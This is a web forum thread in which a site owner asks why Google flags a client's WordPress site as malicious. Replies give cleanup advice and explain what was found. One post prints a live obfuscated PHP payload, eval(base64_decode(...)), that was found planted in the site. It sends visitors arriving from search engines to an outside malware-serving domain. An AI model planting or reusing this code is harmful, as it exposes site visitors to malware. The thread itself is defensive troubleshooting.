Mobile app version of vmapp.org
Login or Join
Deb1703797

: Google says my site contains malware my clients site http://bit.ly/dTOfGF (i used url shortener). I have tried everything to find the malware but i couldnt. I tried the Google checklist http://googlewebmastercentral.blogspot.c

@Deb1703797

Posted in: #Hacking #Malware

my clients site bit.ly/dTOfGF (i used url shortener).

I have tried everything to find the malware but i couldnt.

I tried the Google checklist googlewebmastercentral.blogspot.com/2007/09/quick-security-checklist-for-webmasters.html
i checked for all script files in multiple browsers and couldn't find any...

Strange thing is that Google reports that png files and 1 css has malware...

Any help would be appreciated.

Thanks!

10.03% popularity Vote Up Vote Down


Login to follow query

More posts by @Deb1703797

3 Comments

Sorted by latest first Latest Oldest Best

 

@Angela700

It's more than likely your WordPress install has been compromised.

The permanent fix is to follow these steps to ensure it is fully cleaned and to prevent a recurrence. This is the best method to ensure it is 100% clean.


Backup the database
Make a note of the customizations, such as plugins or any other modifications you’ve made.
Remove all files from the site, be sure to save anything that isn’t part of WordPress!
Reinstall WordPress
Restore the database
Verify the WordPress users are correct and authorized
Re-install any plugins you were using
Reload any additional .php files from known clean copy


This is the best way to ensure the site was not attacked previously and has hidden backdoors loaded deep into the site.

It is extremely important to keep your WordPress software up to date and use strong passwords for your WP admin, FTP and Database, and that you don’t use the same password for all of them.

Additional information: GoDaddy case study

10% popularity Vote Up Vote Down


 

@Deb1703797

This was in a php file that had chmod 666

eval(base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJnb29nbGUiKSkgewoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpewoJCXByZWdfbWF0Y2ggKCIvcVw9KC4qKS8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsKCQlpZiAoc3RyaXN0cigka2tbMV0sIiYiKSkgewoJCQlwcmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOwoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtleTJbMV0pOwoJCX1lbHNlIHsKCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRra1sxXSk7CgkJfQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRrZXl3b3JkKTsKCQlleGl0KCk7Cgl9Cgp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9vIikpIHsKcHJlZ19tYXRjaCAoIi9wXD0oLio/KSYvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7CgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnbmZkZnRocnYuYmVlLnBsLz9xPSIuJGtrWzFdKTsKCQlleGl0KCk7Cn1lbHNlaWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7CnByZWdfbWF0Y2ggKCIvcVw9KC4qPykmLyIsJF9TRVJWRVJbS FRU UF9SRUZFUkVSXSwka2spOwoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRra1sxXSk7CgkJZXhpdCgpOwp9Cgk="));


It only showed when it was visited through google yahoo or bing so i couldnt of seen the malware...

10% popularity Vote Up Vote Down


 

@Sarah324

Remake those images, maybe even using screenshots, and re-save them and replace them in your site. Any malware hidden in them will be removed that way.

Update

That snippet contained code that, if a user found your site through Google, Yahoo, or Bing search, redirected users to a site in Poland that serves up a fake search page and tries to load malware on to a user's computer.

10% popularity Vote Up Vote Down


Back to top | Use Dark Theme